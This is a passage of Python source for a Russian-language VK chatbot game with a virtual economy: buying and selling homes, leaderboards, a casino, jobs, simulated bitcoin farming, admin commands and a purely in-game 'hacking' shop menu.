return "Вы купили " + str(ff["home"]) + " за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '8' and ff["balance"] >= 1000000:
ff["balance"] -= 1000000
ff["home"] = "Дворец в Геленджике"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: кдом 1"
else:
return "У вас уже есть дом или вы неправильно используете команду!\nПример: кдом 1\nЧтобы продать его, используйте 'пдом'"
def sellhome(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["home"] != "":
if ff["home"] == "Картонная коробка":
ff["balance"] += 100
ff["home"] = ""
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 100$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дом на дереве":
ff["home"] = ""
ff["balance"] += 2000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Деревянный дом":
ff["home"] = ""
ff["balance"] += 10000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Квартира в новостройке":
ff["home"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Особняк":
ff["home"] = ""
ff["balance"] += 150000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дом на Рублёвке":
ff["home"] = ""
ff["balance"] += 300000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Личный остров":
ff["home"] = ""
ff["balance"] += 500000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дворец в Геленджике":
ff["home"] = ""
ff["balance"] += 1000000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет дома!'
# дома
# Топ
def sortbybal(entry):
    return int(entry.split(":")[0])
def sortbybtc(entry):
    return float(entry.split(":")[0])
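# Leaderboard helpers: entries are built as "value:label" strings (e.g. "15000:@id123 (Vlad)"),
# so the key functions above just parse the numeric prefix. baltop()/btctop() scan every
# profile in json/, keep the ten largest entries and reschedule themselves roughly every
# 300 seconds via threading.Timer.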
def baltop():
a=[]
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["balance"] > 1000:
if ff["nick"] != "":
a.append(str(str(ff["balance"]) + ":" + "@id" + str(id) + " (" + ff["nick"] + ")"))
else:
user = vk.method("users.get", {"user_ids": id})
a.append(str(str(ff["balance"]) + ":" + "@id" + str(id) + " (" + user[0]['first_name'] + ")"))
        except:
            # skip unreadable or corrupt profiles instead of aborting the whole top
            continue
a = sorted(a, key=sortbybal, reverse=True)
for i in range(len(a)):
a[i] = str(i+1) + ". " + str(a[i].split(":")[1]) + " | " + str(a[i].split(":")[0]) + "$"
threading.Thread(target=reloadtop, args=()).start()
global topbal
topbal = "📜 Топ по балансу:\n\n" + "\n".join(a[:10]) + "\n\nОбновление каждые 5 минут"
def btctop():
a=[]
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["btc"] != 0.0:
if ff["nick"] != "":
a.append(str(str(ff["btc"]) + ": " + "@id" + str(id) + " (" + ff["nick"] + ")"))
else:
user = vk.method("users.get", {"user_ids": id})
a.append(str(str(ff["btc"]) + ": " + "@id" + str(id) + " (" + user[0]['first_name'] + ")"))
        except:
            # skip unreadable or corrupt profiles instead of aborting the whole top
            continue
a = sorted(a, key=sortbybtc, reverse=True)
for i in range(len(a)):
a[i] = str(i+1) + ". " + str(a[i].split(":")[1]) + " | " + str(round(float(a[i].split(":")[0]),5)) + "₿"
global topbtc
topbtc = "📜 Топ по биткоинам:\n\n" + "\n".join(a[:10]) + "\n\nОбновление каждые 5 минут"
threading.Thread(target=reloadtopbtc, args=()).start()
def reloadtop():
threading.Timer(300.0, baltop, args=()).start()
def reloadtopbtc():
try:
threading.Timer(300.0, btctop, args=()).start()
except:
btctop()
# Топ
# Хакерство
def botfightstart(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
bothp = random.randint(1,ff["hhp"])
botdef = random.randint(1,ff["hdef"])
botdmg = random.randint(1,ff["hdamage"])
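# NOTE: the bot-fight feature below is unfinished; botfightstart() only rolls random opponent
# stats from the player's own hhp/hdef/hdamage, and the next two functions are empty stubs.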
def botfightwait(id):
return
def botfight(id):
return
# Хакерство
def mailing(body):
path = "json.dump/"
f = list(os.listdir(path))
for i in range(len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
vk.method("messages.send", {"peer_id": id,
"message": body,
"random_id": random.randint(1, 2147483647)})
return "Рассылка завершена!"
def workreset():
path = "json/"
f = list(os.listdir(path))
for i in range(len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["wstatus"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Thread(target=workreset, args=()).start()
threading.Thread(target=btcfarmreload, args=()).start()
threading.Thread(target=baltop, args=()).start()
threading.Thread(target=btctop, args=()).start()
# btcratestart()
log("system", "Бот запущен")
while True:
try:
messages = vk.method("messages.getConversations", {"offset": 0, "count": 20, "filter": "unanswered"})
if messages["count"] >= 1 and messages["items"][0]["conversation"]["peer"]["type"] == 'user':
id = messages["items"][0]["last_message"]["from_id"]
body = messages["items"][0]["last_message"]["text"]
c = 1
path = "json/"
u = os.listdir(path)
for i in range(len(u)):
u[i] = str(u[i][:-5])
c += 1
if str(id) not in u:
vk.method("messages.send", {"peer_id": id,
"message": prof(id) + "\n\n💎 Добро пожаловать в главное меню",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
            except:
                # profile file missing: prof() appears to create it, so load it again here
                # so that ff is defined for the command handling below
                prof(id)
                with open('json/' + str(id) + '.json') as f:
                    ff = json.loads(f.read())
allow = ["репорт", "профиль", "проф", "unban"]
            if str(body) != "":
if ff["banned"] == "NO" or body.lower().split(" ")[0] in allow:
if str(body.lower()).split()[0] == 'репорт':
temp = str(body.lower()).split("репорт")
msg = temp[1]
if len(msg) > 1:
vk.method("messages.send", {"peer_id": id,
"message": report(str(id), msg),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы пытаетесь отправить пустой репорт!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == "toall":
if id in admins:
temp = str(body).split("toall")[1]
vk.method("messages.send", {"peer_id": id,
"message": mailing(temp),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
# Меню
elif body.lower() == "🏠 главное меню":
vk.method("messages.send", {"peer_id": id,
"message": "💎 Добро пожаловать в главное меню",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "начать" or body.lower() == "start":
vk.method("messages.send", {"peer_id": id,
"message": "Удачи в развитии!",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Меню
elif body.lower() == 'пинг':
vk.method("messages.send", {"peer_id": id,
"message": "Не Миша,всё хуйня! Давай по новой!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'хелп' or body.lower() == 'помощь' or body.lower() == 'команды':
vk.method("messages.send", {"peer_id": id,
"message": help(),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пхелп':
if id in admins or id in moders:
vk.method("messages.send", {"peer_id": id,
"message": staffhelp(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'админпанель':
if id in admins or id in moders:
vk.method("messages.send", {"peer_id": id,
"message": "Ну раз тебе так хочется,то на",
"keyboard": adminmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'профиль' or body.lower() == 'проф':
vk.method("messages.send", {"peer_id": id,
"message": prof(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'баланс' or body.lower() == 'бал':
vk.method("messages.send", {"peer_id": id,
"message": bal(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'стата':
vk.method("messages.send", {"peer_id": id,
"message": gstats(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "анекдот":
vk.method("messages.send",
{"peer_id": id, "message": getanekdot(), "random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кстата':
if len(str(body).split()) == 3:
temp = str(body).split(" ")
nick = temp[1]
idd = temp[2]
stats(nick, idd)
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Для показа статистики введите ник и id Battle.net через пробел. Пример: кстата Vlad 214228⚠",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кстат20':
if len(body.split(" ")) == 3:
temp = str(body).split(" ")
nick = temp[1]
idd = temp[2]
stats20(nick, idd)
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Для показа статистики введите ник и id Battle.net через пробел. Пример: кстат20 Vlad 214228⚠",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сбал':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cbal(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дбал':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
val = temp[2]
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": dbal(idd, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дпроф':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": dprof(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сбитк':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cbtc(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'слвл':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": clvl(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сопыт':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cexp(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пoлная накрутка':
if id in admins or id in moders:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
cbal(id, "1000000")
cbtc(id, "5000.0")
clvl(id, "5")
cexp(id, "500")
ff["balance"] = 1000000
ff["bank"] = 1000000
ff["car"] = "Tesla model S"
ff["home"] = "Личный остров со шлюхами"
ff["phone"] = "iPhone 12 Gold Edition"
ff["gpu"] = "nVidia Tesla A100"
ff["farming"] = True
ff["gpu_amount"] = 5
ff["farm"] = 0.1
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "Накрутка завершена!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'oбнуление':
if id in admins or id in moders:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
cbal(id, "1000")
cbtc(id, "0.0")
clvl(id, "1")
cexp(id, "0")
ff["balance"] = 0
ff["bank"] = 0
ff["car"] = ""
ff["home"] = ""
ff["phone"] = ""
ff["gpu"] = ""
ff["gpu_amount"] = 0
ff["farm"] = 0.0
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "Обнуление завершено!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == "игры" or body.lower() == "⬅ игры":
vk.method("messages.send",
{"peer_id": id,
"message": games(),
"keyboard": gamesmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "биткоины" or body.lower() == "биткоин" or body.lower() == "битки" or body.lower() == "битк":
vk.method("messages.send",
{"peer_id": id,
"message": "Выберите что вы хотите сделать\n" + bal(id),
"keyboard": btcmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'казино' or str(body).split()[0] == 'казик':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
amount = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": kaz(id, amount),
"keyboard": kazmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Добро пожаловать в казино!",
"keyboard": kazmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'монеточка' or str(body.lower()).split()[0] == 'монетка':
if len(str(body).split()) >= 3:
temp = str(body).split(" ")
side = temp[1]
amount = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": monetka(id, side , amount),
"keyboard": monetkasidemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Обычная игра в монеточку\nВыберите сторону [Орел или Решка] и укажите сткаву\nПример: Монетка орел 1000",
"keyboard": monetkasidemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == "орел":
vk.method("messages.send",
{"peer_id": id,
"message": "Вы выбрали Орла",
"keyboard": monetkaorelmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "решка":
vk.method("messages.send",
{"peer_id": id,
"message": "Вы выбрали Решку",
"keyboard": monetkareshkamenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'сник':
if len(str(body).split()) >= 2:
temp = str(body).split("сник")
nickk = temp[1][1:]
vk.method("messages.send", {"peer_id": id,
"message": nick(id, nickk),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Ваш ник пустой\nПример: 'сник Владимир Путин'",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дник':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
nickk = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": dnick(idd, nickk),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'работать' or body.lower() == '💻 работать':
vk.method("messages.send", {"peer_id": id,
"message": work(str(id)),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'уволиться':
vk.method("messages.send", {"peer_id": id,
"message": dwork(str(id)),
"keyboard": mainworkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'устроиться':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": hwork(str(id), val),
"keyboard": worksmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": works(id),
"keyboard": worksmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'users':
if id in admins or id in moders:
if len(str(body).split()) == 1:
vk.method("messages.send", {"peer_id": id,
"message": ulist(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'gban':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
rsn = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": giveban(id, idd, rsn),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\n'gban {id} {причина}'",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'unban':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": unban(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\n'unban {id}'",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'staff' or body.lower() == 'админы' or body.lower() == 'модеры' or body.lower() == 'стафф':
vk.method("messages.send", {"peer_id": id,
"message": staff(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'фильм':
vk.method("messages.send", {"peer_id": id,
"message": rfilm(),
"attachment": d,
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'работа' or body.lower() == '⬅ работа':
vk.method("messages.send", {"peer_id": id,
"message": workinfo(id),
"keyboard": mainworkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'уровни':
vk.method("messages.send", {"peer_id": id,
"message": levels(),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'передать' or str(body.lower()).split()[0] == 'перевод':
# if id in admins or id in moders:
# vk.method("messages.send", {"peer_id": id,
# "message": "Персоналу запрещено передавать деньги",
# "random_id": random.randint(1, 2147483647)})
# else:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
val = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": pay(id, idd, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\nПередать {id} {сумма}\n\nЧтобы узнать ID - используйте 'ид {ссылка на профиль}'",
"random_id": random.randint(1, 2147483647)})
                    elif str(body.lower()).split()[0] == 'банк' or body.lower() == 'банк баланс':
temp = str(body.lower()).split(" ")
if len(temp) == 3:
type = temp[1]
amount = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": bank(id, type, amount),
"keyboard": bankmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
vk.method("messages.send", {"peer_id": id,
"message": "💳 Баланс счёта: " + str(ff["bank"]) + "$\n\n⚠ Используйте:\nБанк положить {сумма}\nили\nБанк снять {сумма}",
"keyboard": bankmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'бонус':
vk.method("messages.send", {"peer_id": id,
"message": gbonus(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == "ид":
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": idsearch(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Чтобы узнать ID - используйте 'ид {ссылка на профиль}'",
"random_id": random.randint(1, 2147483647)})
# Магазин
elif body.lower() == 'магазин' or body.lower() == "⬅ магазин":
vk.method("messages.send", {"peer_id": id,
"message": shop(),
"keyboard": shopmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'продать':
vk.method("messages.send", {"peer_id": id,
"message": sell(),
"keyboard": sellmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'машины':
vk.method("messages.send", {"peer_id": id,
"message": cars(),
"keyboard": carsmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'телефоны':
vk.method("messages.send", {"peer_id": id,
"message": phones(),
"keyboard": phonemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'дома':
vk.method("messages.send", {"peer_id": id,
"message": homes(),
"keyboard": homemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кмашину':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bcar(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: кмашину 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пмашину':
vk.method("messages.send", {"peer_id": id,
"message": sellcar(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'ктел':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bphone(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ктел 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'птел':
vk.method("messages.send", {"peer_id": id,
"message": sellphone(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кдом':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bhome(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ктел 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пдом':
vk.method("messages.send", {"peer_id": id,
"message": sellhome(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Магазин
elif body.lower() == 'ихелп':
vk.method("messages.send", {"peer_id": id,
"message": prophelp(),
"random_id": random.randint(1, 2147483647)})
# Bytecoin
elif body.lower() == 'видеокарты':
vk.method("messages.send", {"peer_id": id,
"message": fshop(),
"keyboard": gpumenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'ккарту':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bfarm(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ккарту 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пкарту':
vk.method("messages.send", {"peer_id": id,
"message": sfarm(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "ферма":
vk.method("messages.send", {"peer_id": id,
"message": farmstatus(id),
"keyboard": farmmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "♻ обновить":
vk.method("messages.send", {"peer_id": id,
"message": farmstatus(id),
"keyboard": farmmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "сбитки":
vk.method("messages.send", {"peer_id": id,
"message": sellbtc(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "бкурс":
vk.method("messages.send", {"peer_id": id,
"message": btcrateshow(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пбитк':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": btctousd(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: пбитк 1.25",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кбитк':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": usdtobtc(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: пбитк 1.25",
"random_id": random.randint(1, 2147483647)})
# Bytecoin
elif body.lower() == 'топ':
vk.method("messages.send", {"peer_id": id,
"message": "Какй топ вы хотите посмтореть?"
"\nБалтоп - топ по балансу"
"\nБитктоп - топ по кол-ву биткоинов",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'битктоп':
try:
vk.method("messages.send", {"peer_id": id,
"message": topbtc,
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
except:
vk.method("messages.send", {"peer_id": id,
"message": "Топ еще не обновлён",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'балтоп':
try:
vk.method("messages.send", {"peer_id": id,
"message": topbal,
"random_id": random.randint(1, 2147483647)})
log(id, body)
except:
vk.method("messages.send", {"peer_id": id,
"message": "Топ еще не обновлён",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
# Хакерство
elif body.lower() == 'хакерство' or body.lower() == "⬅ хакерство" or body.lower() == "🏠 хакерство":
vk.method("messages.send", {"peer_id": id,
"message": hackmenu(id),
"keyboard": mainhackmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'darkshop' or body.lower() == "⬅ darkshop":
vk.method("messages.send", {"peer_id": id,
"message": darkshop(),
"keyboard": dsmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'компы' or body.lower() == 'компьютеры' or body.lower() == 'комп':
vk.method("messages.send", {"peer_id": id,
"message": comps(),
"keyboard": compmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'впн' or body.lower() == 'vpn':
vk.method("messages.send", {"peer_id": id,
"message": vpns(),
"keyboard": vpnmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'убежища' or body.lower() == 'убежище' or body.lower() == 'убеж':
vk.method("messages.send", {"peer_id": id,
"message": shltrs(),
"keyboard": shltrmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'ккомп':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bcomp(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'квпн':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bvpn(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кубежище' or str(body.lower()).split()[0] == 'кубеж':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
